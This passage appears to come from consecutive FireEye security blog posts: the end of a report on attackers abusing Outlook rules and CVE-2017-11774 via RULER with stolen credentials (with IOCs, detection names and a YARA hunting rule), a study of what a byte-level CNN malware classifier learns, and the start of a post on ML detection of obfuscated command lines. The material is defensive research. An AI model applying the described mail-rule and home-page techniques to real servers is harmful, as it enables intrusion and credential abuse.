  • Previous compromise within your organization where credentials were compromised but not identified or reset.
  • Poor password choice or password security policies resulting in brute-forced credentials.
  • Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via documents intended to phish them from users.
  • Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.

Once the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange’s legitimate features.

RULER In-The-Wild: Here, There, and Everywhere

SensePost’s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP. As detailed in the "Managed Defense Rapid Responses" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with Aut2Exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f), and executed a PowerShell one-liner to retrieve further malicious content.

Without the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:

  • Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook itself was directly exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.
  • The transfer of 95f3bea43338addc1ad951cd2d42eb6f was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that WebDAV hosted payload.
  • The choice of WebDAV for this initial transfer of the stager is the result of restrictions in mail rule creation; the payload must be "locally" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's initial write-up prior to RULER’s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your malicious payload via an Outlook rule. WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than to find a domain-joined host communicating via SMB to a non-domain-joined host at an arbitrary IP address.
  • The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. 95f3bea43338addc1ad951cd2d42eb6f does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.

With that in mind, the initial infection vector is illustrated in Figure 4.


Figure 4: Initial infection vector

As both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible disclosure of CVE-2017-11774 was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker’s perspective, refer to SensePost's blog.

FireEye has observed and documented an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.

Understanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend that organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. Beyond implementing multi-factor authentication for Office 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost’s RULER.

Microsoft Outlook Security Update | RULER Module Addressed
June 13, 2017 Security Update | RULER.RULES
September 12, 2017 Security Update | RULER.FORMS
October 10, 2017 Security Update | RULER.HOMEPAGE

Table 3: Outlook attack surface mitigations

Detecting the Techniques

FireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.

PLATFORM | SIGNATURE NAME
Endpoint Security | POWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY)
Endpoint Security | SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
Endpoint Security | MIMIKATZ (CREDENTIAL STEALER)
Endpoint Security | RULER OUTLOOK PERSISTENCE (UTILITY)
Network and Email Security | FE_Exploit_HTML_CVE201711774
Network and Email Security | FE_HackTool_Win_RULER
Network and Email Security | FE_HackTool_Linux_RULER
Network and Email Security | FE_HackTool_OSX_RULER
Network and Email Security | FE_Trojan_OLE_RULER
Network and Email Security | HackTool.RULER (Network Traffic)

Table 4: FireEye product detections

For organizations interested in hunting for Outlook home page shell and persistence, we’ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:

rule Hunting_Outlook_Homepage_Shell_and_Persistence
{
meta:
        author = "Nick Carr (@itsreallynick)"
        reference_hash = "506fe019d48ff23fac8ae3b6dd754f6e"
    strings:
        $script_1 = "<htm" ascii nocase wide
        $script_2 = "<script" ascii nocase wide
        $viewctl1_a = "ViewCtl1" ascii nocase wide
        $viewctl1_b = "0006F063-0000-0000-C000-000000000046" ascii wide
        $viewctl1_c = ".OutlookApplication" ascii nocase wide
    condition:
        uint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*)
}
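
For hunting outside of FireEye products, the rule can also be applied with the yara-python bindings; the sketch below assumes the rule has been saved to a local file, and both paths shown are hypothetical.

import os
import yara   # yara-python

# Compile the hunting rule from a local copy (hypothetical path).
rules = yara.compile(filepath="outlook_homepage.yar")

# Recursively scan a directory of collected artifacts for matches.
for root, _, files in os.walk("collected_artifacts"):
    for name in files:
        path = os.path.join(root, name)
        matches = rules.match(filepath=path)
        if matches:
            print(path, [m.rule for m in matches])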

Acknowledgements

The authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.

What are Deep Neural Networks Learning About Malware?

An increasing number of modern antivirus solutions rely on machine learning (ML) techniques to protect users from malware. While ML-based approaches, like FireEye Endpoint Security’s MalwareGuard capability, have done a great job at detecting new threats, they also come with substantial development costs. Creating and curating a large set of useful features takes significant amounts of time and expertise from malware analysts and data scientists (note that in this context a feature refers to a property or characteristic of the executable that can be used to distinguish between goodware and malware). In recent years, however, deep learning approaches have shown impressive results in automatically learning feature representations for complex problem domains, like images, speech, and text. Can we take advantage of these advances in deep learning to automatically learn how to detect malware without costly feature engineering?

As it turns out, deep learning architectures, and in particular convolutional neural networks (CNNs), can do a good job of detecting malware simply by looking at the raw bytes of Windows Portable Executable (PE) files. Over the last two years, FireEye has been experimenting with deep learning architectures for malware classification, as well as methods to evade them. Our experiments have demonstrated surprising levels of accuracy that are competitive with traditional ML-based solutions, while avoiding the costs of manual feature engineering. Since the initial presentation of our findings, other researchers have published similarly impressive results, with accuracy upwards of 96%.

Since these deep learning models are only looking at the raw bytes without any additional structural, semantic, or syntactic context, how can they possibly be learning what separates goodware from malware? In this blog post, we answer this question by analyzing FireEye’s deep learning-based malware classifier.

Highlights

  • FireEye’s deep learning classifier can successfully identify malware using only the unstructured bytes of the Windows PE file.
  • Import-based features, like names and function call fingerprints, play a significant role in the features learned across all levels of the classifier.
  • Unlike other deep learning application areas, where low-level features tend to generally capture properties across all classes, many of our low-level features focused on very specific sequences primarily found in malware.
  • End-to-end analysis of the classifier identified important features that closely mirror those created through manual feature engineering, which demonstrates the importance of classifier depth in capturing meaningful features.

Background

Before we dive into our analysis, let’s first discuss what a CNN classifier is doing with Windows PE file bytes. Figure 1 shows the high-level operations performed by the classifier while “learning” from the raw executable data. We start with the raw byte representation of the executable, absent any structure that might exist (1). This raw byte sequence is embedded into a high-dimensional space where each byte is replaced with an n-dimensional vector of values (2). This embedding step allows the CNN to learn relationships among the discrete bytes by moving them within the n-dimensional embedding space. For example, if the bytes 0xe0 and 0xe2 are used interchangeably, then the CNN can move those two bytes closer together in the embedding space so that the cost of replacing one with the other is small. Next, we perform convolutions over the embedded byte sequence (3). As we do this across our entire training set, our convolutional filters begin to learn the characteristics of certain sequences that differentiate goodware from malware (4). In simpler terms, we slide a fixed-length window across the embedded byte sequence and the convolutional filters learn the important features from across those windows. Once we have scanned the entire sequence, we can then pool the convolutional activations to select the best features from each section of the sequence (i.e., those that maximally activated the filters) to pass along to the next level (5). In practice, the convolution and pooling operations are used repeatedly in a hierarchical fashion to aggregate many low-level features into a smaller number of high-level features that are more useful for classification. Finally, we use the aggregated features from our pooling as input to a fully-connected neural network, which classifies the PE file sample as either goodware or malware (6).


Figure 1: High-level overview of a convolutional neural network applied to raw bytes from a Windows PE file.
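
For readers who prefer code to diagrams, the following PyTorch sketch wires together the same embed/convolve/pool/classify steps. It is not the production architecture: the single convolution and pooling stage, layer sizes, and filter width are illustrative stand-ins for the deeper hierarchy described below.

import torch
import torch.nn as nn

class ByteCNN(nn.Module):
    """Toy raw-byte classifier: embed bytes, convolve, pool, classify."""
    def __init__(self, embed_dim=8, n_filters=96, window=16):
        super().__init__()
        # 256 byte values plus one special padding symbol (index 256).
        self.embed = nn.Embedding(257, embed_dim, padding_idx=256)
        self.conv = nn.Conv1d(embed_dim, n_filters, kernel_size=window)
        self.pool = nn.AdaptiveMaxPool1d(1)        # global max pooling
        self.fc = nn.Linear(n_filters, 2)          # goodware vs. malware

    def forward(self, byte_seq):                   # byte_seq: (batch, length)
        x = self.embed(byte_seq).transpose(1, 2)   # -> (batch, embed_dim, length)
        x = torch.relu(self.conv(x))               # learn local byte patterns
        x = self.pool(x).squeeze(-1)               # strongest activation per filter
        return self.fc(x)                          # class scores

# Example: a batch of one truncated/padded 4 KB "file" of random bytes.
fake_file = torch.randint(0, 256, (1, 4096))
print(ByteCNN()(fake_file).shape)                  # torch.Size([1, 2])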

The specific deep learning architecture that we analyze here actually has five convolutional and max pooling layers arranged in a hierarchical fashion, which allows it to learn complex features by combining those discovered at lower levels of the hierarchy. To efficiently train such a deep neural network, we must restrict our input sequences to a fixed length – truncating any bytes beyond this length or using special padding symbols to fill out smaller files. For this analysis, we chose an input length of 100KB, though we have experimented with lengths upwards of 1MB. We trained our CNN model on more than 15 million Windows PE files, 80% of which were goodware and the remainder malware. When evaluated against a test set of nearly 9 million PE files observed in the wild from June to August 2018, the classifier achieves an accuracy of 95.1% and an F1 score of 0.96, which are on the higher end of scores reported by previous work.

In order to figure out what this classifier has learned about malware, we will examine each component of the architecture in turn. At each step, we use either a sample of 4,000 PE files taken from our training data to examine broad trends, or a smaller set of six artifacts from the NotPetya, WannaCry, and BadRabbit ransomware families to examine specific features.

Bytes in (Embedding) Space

The embedding space can encode interesting relationships that the classifier has learned about the individual bytes and determine whether certain bytes are treated differently than others because of their implied importance to the classifier’s decision. To tease out these relationships, we will use two tools: (1) a dimensionality reduction technique called multi-dimensional scaling (MDS) and (2) a density-based clustering method called HDBSCAN. The dimensionality reduction technique allows us to move from the high-dimensional embedding space to an approximation in two-dimensional space that we can easily visualize, while still retaining the overall structure and organization of the points. Meanwhile, the clustering technique allows us to identify dense groups of points, as well as outliers that have no nearby points. The underlying intuition is that outliers are treated as “special” by the model, since no other points can easily replace them without a significant change in upstream calculations, while dense clusters of points can be used interchangeably.
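
This analysis might be set up along the following lines with scikit-learn and the hdbscan package; the random matrix stands in for the trained embedding matrix, and the clustering parameters are illustrative.

import numpy as np
from sklearn.manifold import MDS
import hdbscan

# Stand-in for the learned embedding matrix: one n-dimensional vector per byte.
embeddings = np.random.rand(256, 8)

# Project the byte vectors down to two dimensions for visualization.
coords_2d = MDS(n_components=2, random_state=0).fit_transform(embeddings)
print(coords_2d.shape)    # (256, 2): the points that would be plotted

# Cluster the original high-dimensional vectors; label -1 marks outliers,
# i.e. bytes the model treats as hard to substitute.
labels = hdbscan.HDBSCAN(min_cluster_size=5).fit_predict(embeddings)
for byte_value in np.where(labels == -1)[0]:
    print("outlier byte: 0x%02x" % byte_value)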


Figure 2: Visualization of the byte embedding space using multi-dimensional scaling (MDS) and clustered with hierarchical density-based clustering (HDBSCAN) with clusters (Left) and outliers labeled (Right).

On the left side of Figure 2, we show the two-dimensional representation of our byte embedding space with each of the clusters labeled, along with an outlier cluster labeled as -1. As you can see, the vast majority of bytes fall into one large catch-all class (Cluster 3), while the remaining three clusters have just two bytes each. Though there are no obvious semantic relationships in these clusters, the bytes that were included are interesting in their own right – for instance, Cluster 0 includes our special padding byte that is only used when files are smaller than the fixed-length cutoff, and Cluster 1 includes the ASCII character ‘r.’

What is more fascinating, however, is the set of outliers that the clustering produced, which are shown on the right side of Figure 2. Here, there are a number of intriguing trends that start to appear. For one, each of the bytes in the range 0x0 to 0x6 is present, and these bytes are often used in short forward jumps or when registers are used as instruction arguments (e.g., eax, ebx, etc.). Interestingly, 0x7 and 0x8 are grouped together in Cluster 2, which may indicate that they are used interchangeably in our training data even though 0x7 could also be interpreted as a register argument. Another clear trend is the presence of several ASCII characters in the set of outliers, including ‘\n’, ‘A’, ‘e’, ‘s’, and ‘t.’ Finally, we see several opcodes present, including the call instruction (0xe8), loop and loopne (0xe0, 0xe2), and a breakpoint instruction (0xcc).

Given these findings, we immediately get a sense of what the classifier might be looking for in low-level features: ASCII text and usage of specific types of instructions.

Deciphering Low-Level Features

The next step in our analysis is to examine the low-level features learned by the first layer of convolutional filters. In our architecture, we used 96 convolutional filters at this layer, each of which learns basic building-block features that will be combined across the succeeding layers to derive useful high-level features. When one of these filters sees a byte pattern that it has learned in the current convolution, it will produce a large activation value and we can use that value as a method for identifying the most interesting bytes for each filter. Of course, since we are examining the raw byte sequences, this will merely tell us which file offsets to look at, and we still need to bridge the gap between the raw byte interpretation of the data and something that a human can understand. To do so, we parse the file using PEFile and apply BinaryNinja’s disassembler to executable sections to make it easier to identify common patterns among the learned features for each filter.

Since there are a large number of filters to examine, we can narrow our search by getting a broad sense of which filters have the strongest activations across our sample of 4,000 Windows PE files and where in those files those activations occur. In Figure 3, we show the locations of the 100 strongest activations across our 4,000-sample dataset. This shows a couple of interesting trends, some of which could be expected and others that are perhaps more surprising. For one, the majority of the activations at this level in our architecture occur in the ‘.text’ section, which typically contains executable code. When we compare the ‘.text’ section activations between malware and goodware subsets, there are significantly more activations for the malware set, meaning that even at this low level there appear to be certain filters that have keyed in on specific byte sequences primarily found in malware. Additionally, we see that the ‘UNKNOWN’ section – basically, any activation that occurs outside the valid bounds of the PE file – has many more activations in the malware group than in goodware. This makes some intuitive sense since many obfuscation and evasion techniques rely on placing data in non-standard locations (e.g., embedding PE files within one another).


Figure 3: Distribution of low-level activation locations across PE file headers and sections. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right). UNKNOWN indicates an area outside the valid bounds of the file and NULL indicates an empty section name.
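
To attribute an activation’s file offset to a PE section as in Figure 3, the pefile module can be used roughly as follows; the sample path and offset are hypothetical, and header ranges are not handled in this simplified sketch.

import pefile

def section_for_offset(pe_path, file_offset):
    """Return the name of the PE section containing file_offset,
    or 'UNKNOWN' if it falls outside every section's raw bounds."""
    pe = pefile.PE(pe_path)
    for section in pe.sections:
        start = section.PointerToRawData
        end = start + section.SizeOfRawData
        if start <= file_offset < end:
            name = section.Name.rstrip(b"\x00").decode(errors="replace")
            return name if name else "NULL"
    return "UNKNOWN"

# Hypothetical example: offset of a top filter activation in some sample.
print(section_for_offset("sample.exe", 0x4a10))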

We can also examine the activation trends among the convolutional filters by plotting the top-100 activations for each filter across our 4,000 PE files, as shown in Figure 4. Here, we validate our intuition that some of these filters are overwhelmingly associated with features found in our malware samples. In this case, the activations for Filter 57 occur almost exclusively in the malware set, so that will be an important filter to look at later in our analysis. The other main takeaway from the distribution of filter activations is that the distribution is quite skewed, with only two filters handling the majority of activations at this level in our architecture. In fact, some filters are not activated at all on the set of 4,000 files we are analyzing.


Figure 4: Distribution of activations over each of the 96 low-level convolutional filters. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right).

Now that we have identified the most interesting and active filters, we can disassemble the areas surrounding their activation locations and see if we can tease out some trends. In particular, we are going to look at Filters 83 and 57, both of which were important filters in our model based on activation value. The disassembly results for these filters across several of our ransomware artifacts is shown in Figure 5.

For Filter 83, the trend in activations becomes pretty clear when we look at the ASCII encoding of the bytes, which shows that the filter has learned to detect certain types of imports. If we look closer at the activations (denoted with a ‘*’), these always seem to include characters like ‘r’, ‘s’, ‘t’, and ‘e’, all of which were identified as outliers or found in their own unique clusters during our embedding analysis.  When we look at the disassembly of Filter 57’s activations, we see another clear pattern, where the filter activates on sequences containing multiple push instructions and a call instruction – essentially, identifying function calls with multiple parameters.

In some ways, we can look at Filters 83 and 57 as detecting two sides of the same overarching behavior, with Filter 83 detecting the imports and 57 detecting the potential use of those imports (i.e., by fingerprinting the number of parameters and usage). Due to the independent nature of convolutional filters, the relationship between the imports and their usage (e.g., which imports were used where) is lost, and the classifier treats these as two completely independent features.


Figure 5: Example disassembly of activations for filters 83 (Left) and 57 (Right) from ransomware samples. Lines prepended with '*' contain the actual filter activations, others are provided for context.

Aside from the import-related features described above, our analysis also identified some filters that keyed in on particular byte sequences found in functions containing exploit code, such as DoublePulsar or EternalBlue. For instance, Filter 94 activated on portions of the EternalRomance exploit code from the BadRabbit artifact we analyzed. Note that these low-level filters did not necessarily detect the specific exploit activity, but instead activate on byte sequences within the surrounding code in the same function.

These results indicate that the classifier has learned some very specific byte sequences related to ASCII text and instruction usage that relate to imports, function calls, and artifacts found within exploit code. This finding is surprising because in other machine learning domains, such as images, low-level filters often learn generic, reusable features across all classes.

Bird’s Eye View of End-to-End Features

While it seems that lower layers of our CNN classifier have learned particular byte sequences, the larger question is: does the depth and complexity of our classifier (i.e., the number of layers) help us extract more meaningful features as we move up the hierarchy? To answer this question, we have to examine the end-to-end relationships between the classifier’s decision and each of the input bytes. This allows us to directly evaluate each byte (or segment thereof) in the input sequence and see whether it pushed the classifier toward a decision of malware or goodware, and by how much. To accomplish this type of end-to-end analysis, we leverage the SHapley Additive exPlanations (SHAP) framework developed by Lundberg and Lee. In particular, we use the GradientSHAP method that combines a number of techniques to precisely identify the contributions of each input byte, with positive SHAP values indicating areas that can be considered to be malicious features and negative values for benign features.
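
As a rough sketch of how such an attribution could be wired up with the shap package and a PyTorch model (here, the post-embedding portion of the toy ByteCNN sketched earlier), consider the following; the background and sample tensors are random placeholders, and the exact return format of shap_values can vary between shap versions.

import torch
import torch.nn as nn
import shap

# Post-embedding portion of a toy byte classifier: it takes already-embedded
# byte sequences as continuous input so gradients can flow for GradientSHAP.
class Head(nn.Module):
    def __init__(self, embed_dim=8, n_filters=96):
        super().__init__()
        self.conv = nn.Conv1d(embed_dim, n_filters, kernel_size=16)
        self.pool = nn.AdaptiveMaxPool1d(1)
        self.fc = nn.Linear(n_filters, 2)

    def forward(self, x):                      # x: (batch, embed_dim, length)
        x = self.pool(torch.relu(self.conv(x))).squeeze(-1)
        return self.fc(x)

head = Head()
background = torch.randn(16, 8, 4096)          # placeholder background set
sample = torch.randn(1, 8, 4096)               # placeholder embedded "file"

explainer = shap.GradientExplainer(head, background)
shap_values = explainer.shap_values(sample)    # one array per output class

# Aggregate over embedding dimensions to get one value per byte offset;
# positive values push toward the "malware" class (index 1).
per_byte = shap_values[1].sum(axis=1)
print(per_byte.shape)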

After applying the GradientSHAP method to our ransomware dataset, we noticed that many of the most important end-to-end features were not directly related to the types of specific byte sequences that we discovered at lower layers of the classifier. Instead, many of the end-to-end features that we discovered mapped closely to features developed from manual feature engineering in our traditional ML models. As an example, the end-to-end analysis on our ransomware samples identified several malicious features in the checksum portion of the PE header, which is commonly used as a feature in traditional ML models. Other notable end-to-end features included the presence or absence of certain directory information related to certificates used to sign the PE files, anomalies in the section table that define the properties of the various sections of the PE file, and specific imports that are often used by malware (e.g., GetProcAddress and VirtualAlloc).

In Figure 6, we show the distribution of SHAP values across the file offsets for the worm artifact of the WannaCry ransomware family. Many of the most important malicious features found in this sample are focused in the PE header structures, including previously mentioned checksum and directory-related features. One particularly interesting observation from this sample, though, is that it contains another PE file embedded within it, and the CNN discovered two end-to-end features related to this. First, it identified an area of the section table that indicated the ‘.data’ section had a virtual size that was more than 10x larger than the stated physical size of the section. Second, it discovered maliciously-oriented imports and exports within the embedded PE file itself. Taken as a whole, these results show that the depth of our classifier appears to have helped it learn more abstract features and generalize beyond the specific byte sequences we observed in the activations at lower layers.


Figure 6: SHAP values for file offsets from the worm artifact of WannaCry. File offsets with positive values are associated with malicious end-to-end features, while offsets with negative values are associated with benign features.
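
One of the section-table anomalies mentioned above, a virtual size far larger than the on-disk size, is easy to check for with pefile; the sketch below uses an illustrative 10x threshold and a hypothetical sample path, not a tuned detection rule.

import pefile

def suspicious_sections(pe_path, ratio=10):
    """Flag sections whose virtual size dwarfs their raw (on-disk) size."""
    pe = pefile.PE(pe_path)
    flagged = []
    for s in pe.sections:
        raw = s.SizeOfRawData or 1                        # avoid divide-by-zero
        if s.Misc_VirtualSize / raw > ratio:
            flagged.append(s.Name.rstrip(b"\x00").decode(errors="replace"))
    return flagged

print(suspicious_sections("sample.exe"))                  # hypothetical path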

Summary

In this blog post, we dove into the inner workings of FireEye’s byte-based deep learning classifier in order to understand what it, and other deep learning classifiers like it, are learning about malware from its unstructured raw bytes. Through our analysis, we have gained insight into a number of important aspects of the classifier’s operation, weaknesses, and strengths:

  • Import Features: Import-related features play a large role in classifying malware across all levels of the CNN architecture. We found evidence of ASCII-based import features in the embedding layer, low-level convolutional features, and end-to-end features.
  • Low-Level Instruction Features: Several features discovered at the lower layers of our CNN classifier focused on sequences of instructions that capture specific behaviors, such as particular types of function calls or code surrounding certain types of exploits. In many cases, these features were primarily associated with malware, which runs counter to the typical use of CNNs in other domains, such as image classification, where low-level features capture generic aspects of the data (e.g., lines and simple shapes). Additionally, many of these low-level features did not appear in the most malicious end-to-end features.
  • End-to-End Features: Perhaps the most interesting result of our analysis is that many of the most important maliciously-oriented end-to-end features closely map to common manually-derived features from traditional ML classifiers. Features like the presence or absence of certificates, obviously mangled checksums, and inconsistencies in the section table do not have clear analogs to the lower-level features we uncovered. Instead, it appears that the depth and complexity of our CNN classifier plays a key role in generalizing from specific byte sequences to meaningful and intuitive features.

It is clear that deep learning offers a promising path toward sustainable, cutting-edge malware classification. At the same time, significant improvements will be necessary to create a viable real-world solution that addresses the shortcomings discussed in this article. The most important next step will be improving the architecture to include more information about the structural, semantic, and syntactic context of the executable rather than treating it as an unstructured byte sequence. By adding this specialized domain knowledge directly into the deep learning architecture, we allow the classifier to focus on learning relevant features for each context, inferring relationships that would not be possible otherwise, and creating even more robust end-to-end features with better generalization properties.

The content of this blog post is based on research presented at the Conference on Applied Machine Learning for Information Security (CAMLIS) in Washington, DC on Oct. 12-13, 2018. Additional material, including slides and a video of the presentation, can be found on the conference website.

Obfuscated Command Line Detection Using Machine Learning

This blog post presents a machine learning (ML) approach to solving an emerging security problem: detecting obfuscated Windows command line invocations on endpoints. We start out with an introduction to this relatively new threat capability, and then discuss how such problems have traditionally been handled. We then describe a machine learning approach to solving this problem and point out how ML vastly simplifies development and maintenance of a robust obfuscation detector. Finally, we present the results obtained using two different ML techniques and compare the benefits of each.

Introduction

Malicious actors are increasingly “living off the land,” using built-in utilities such as PowerShell and the Windows Command Processor (cmd.exe) as part of their infection workflow in an effort to minimize the chance of detection and bypass whitelisting defense strategies. The release of new obfuscation tools makes detection of these threats even more difficult by adding a layer of indirection between the visible syntax and the final behavior of the command. For example, Invoke-Obfuscation and Invoke-DOSfuscation are two recently released tools that automate the obfuscation of PowerShell and Windows command lines, respectively.

The traditional pattern matching and rule-based approaches for detecting obfuscation are difficult to develop and generalize, and can pose a huge maintenance headache for defenders. We will show how using ML techniques can address this problem.

Detecting obfuscated command lines is a very useful technique because it allows defenders to reduce the data they must review by providing a strong filter for possibly malicious activity. While there are some examples of “legitimate” obfuscation in the wild, in the overwhelming majority of cases, the presence of obfuscation generally serves as a signal for malicious intent.

Background

There has been a long history of obfuscation being employed to hide the presence of malware, ranging from encryption of malicious payloads (starting with the Cascade virus) and obfuscation of strings, to JavaScript obfuscation. The purpose of obfuscation is two-fold:

  • Make it harder to find patterns in executable code, strings or scripts that can easily be detected by defensive software.
  • Make it harder for reverse engineers and analysts to decipher and fully understand what the malware is doing.

In that sense, command line obfuscation is not a new problem – it is just that the target of obfuscation (the Windows Command Processor) is relatively new. The recent release of tools such as Invoke-Obfuscation (for PowerShell) and Invoke-DOSfuscation (for cmd.exe) has demonstrated just how flexible these commands are, and how even incredibly complex obfuscation will still run commands effectively.

There are two categorical axes in the space of obfuscated vs. non-obfuscated command lines: simple/complex and clear/obfuscated (see Figure 1 and Figure 2). For this discussion, “simple” means generally short and relatively uncomplicated, but possibly still containing obfuscation, while “complex” means long, complicated strings that may or may not be obfuscated. Thus, the simple/complex axis is orthogonal to obfuscated/unobfuscated. The interplay of these two axes produces many boundary cases where simple heuristics to detect whether a script is obfuscated (e.g., the length of a command) will produce false positives on unobfuscated samples. The flexibility of the command line processor makes classification a difficult task from an ML perspective.


Figure 1: Dimensions of obfuscation


Figure 2: Examples of weak and strong obfuscation

Traditional Obfuscation Detection

Traditional obfuscation detection can be split into three approaches. One approach is to write a large number of complex regular expressions to match the most commonly abused syntax of the Windows command line. Figure 3 shows one such regular expression that attempts to match ampersand chaining with a call command, a common pattern seen in obfuscation. Figure 4 shows an example command sequence this regex is designed to detect.


Figure 3: A common obfuscation pattern captured as a regular expression


Figure 4: A common obfuscation pattern (calling echo in obfuscated fashion in this example)

There are two problems with this approach. First, it is virtually impossible to develop regular expressions to cover every possible abuse of the command line. The flexibility of the command line results in a language that is impractical, if not impossible, to fully capture with regular expressions. A second issue with this approach is that even if a regular expression exists for the technique a malicious sample is using, a determined attacker can make minor modifications to avoid the regular expression. Figure 5 shows a minor modification to the sequence in Figure 4, which avoids the regex detection.


Figure 5: A minor change (extra carets) to an obfuscated command line that breaks the regular expression in Figure 3
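
The exact expressions in Figure 3 and Figure 5 are not reproduced here, but the Python sketch below illustrates the same fragility with a simplified, hypothetical pattern for ampersand-chained call commands: a single added caret defeats it.

import re

# Simplified, hypothetical pattern for detecting "call" chained with
# ampersands (not the actual regex shown in Figure 3).
chain_call = re.compile(r"&&?\s*call\s+", re.IGNORECASE)

detected = 'cmd /c "set x=echo&& call %x% hello"'
evaded   = 'cmd /c "set x=echo&& c^all %x% hello"'   # one caret added

print(bool(chain_call.search(detected)))   # True  -- the pattern fires
print(bool(chain_call.search(evaded)))     # False -- trivially bypassed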

The second approach, which is closer to an ML approach, involves writing complex if-then rules. However, these rules are hard to derive, are complex to verify, and pose a significant maintenance burden as obfuscation authors evolve their techniques to escape detection by such rules. Figure 6 shows one such if-then rule.


Figure 6: An if-then rule that *may* indicate obfuscation (notice how loose this rule is, and how false positives are likely)

A third approach is to combine regular expressions and if-then rules. This greatly complicates the development and maintenance burden, and still suffers from the same weaknesses that make the first two approaches fragile. Figure 7 shows an example of an if-then rule with regular expressions. Clearly, it is easy to appreciate how burdensome it is to generate, test, maintain and determine the efficacy of such rules.


Figure 7: A combination of an if-then rule with regular expressions to detect obfuscation (a real hand-built obfuscation detector would consist of tens or hundreds of rules and still have gaps in its detection)

The ML Approach – Moving Beyond Pattern Matching and Rules

Using ML simplifies the solution to these problems. We will illustrate two ML approaches: a feature-based approach and a feature-less end-to-end approach.

There are some ML techniques that can work with any kind of raw data (provided it is numeric), and neural networks are a prime example. Most other ML algorithms require the modeler to extract pertinent information, called features, from raw data before they are fed into the algorithm. Some examples of this latter type are tree-based algorithms, which we will also look at in this blog (we described the structure and uses of Tree-Based algorithms in a previous blog post, where we used a Gradient-Boosted Tree-Based Model).

ML Basics – Neural Networks

Neural networks are a type of ML algorithm that have recently become very popular and consist of a series of elements called neurons. A neuron is essentially an element that takes a set of inputs, computes a weighted sum of these inputs, and then feeds the sum into a non-linear function. It has been shown that a relatively shallow network of neurons can approximate any continuous mapping between input and output. The specific type of neural network we used for this research is what is called a Convolutional Neural Network (CNN), which was developed primarily for computer vision applications, but has also found success in other domains including natural language processing. One of the main benefits of a neural network is that it can be trained without having to manually engineer features.
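
As a deliberately tiny illustration of the neuron described above, the following Python sketch computes a weighted sum of inputs and passes it through a non-linear function; the weights and inputs are arbitrary.

import numpy as np

def neuron(inputs, weights, bias):
    # Weighted sum of inputs, then a non-linearity (ReLU in this sketch).
    return max(0.0, float(np.dot(inputs, weights) + bias))

x = np.array([0.2, 0.7, 0.1])       # example inputs
w = np.array([0.5, -1.3, 2.0])      # arbitrary "learned" weights
print(neuron(x, w, bias=0.4))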

Featureless ML

While neural networks can be used with feature data, one of the attractions of this approach is that it can work with raw data (converted into numeric form) without doing any feature design or extraction. The first step in the model is converting text data into numeric form. We used a character-based encoding where each character type was encoded by a real valued number. The value was automatically derived during training and conveys semantic information about the relationships between characters as they apply to cmd.exe syntax.
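
A sketch of this kind of character-level encoding is shown below: each command line becomes a fixed-length sequence of Unicode code points, which an embedding layer can then map to learned real-valued vectors. The length cap, vocabulary size, and embedding width are arbitrary choices for illustration, not the values used in our model.

import torch
import torch.nn as nn

MAX_LEN = 256          # arbitrary fixed length for this sketch
VOCAB = 0x10000        # basic multilingual plane; 0 doubles as padding

def encode(cmdline):
    # Map each character to its Unicode code point, truncate/pad to MAX_LEN.
    points = [min(ord(c), VOCAB - 1) for c in cmdline[:MAX_LEN]]
    return points + [0] * (MAX_LEN - len(points))

embedding = nn.Embedding(VOCAB, 16, padding_idx=0)
batch = torch.tensor([encode('cmd /c "set x=echo&& c^all %x% hi"')])
print(embedding(batch).shape)    # torch.Size([1, 256, 16])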

Feature-Based ML

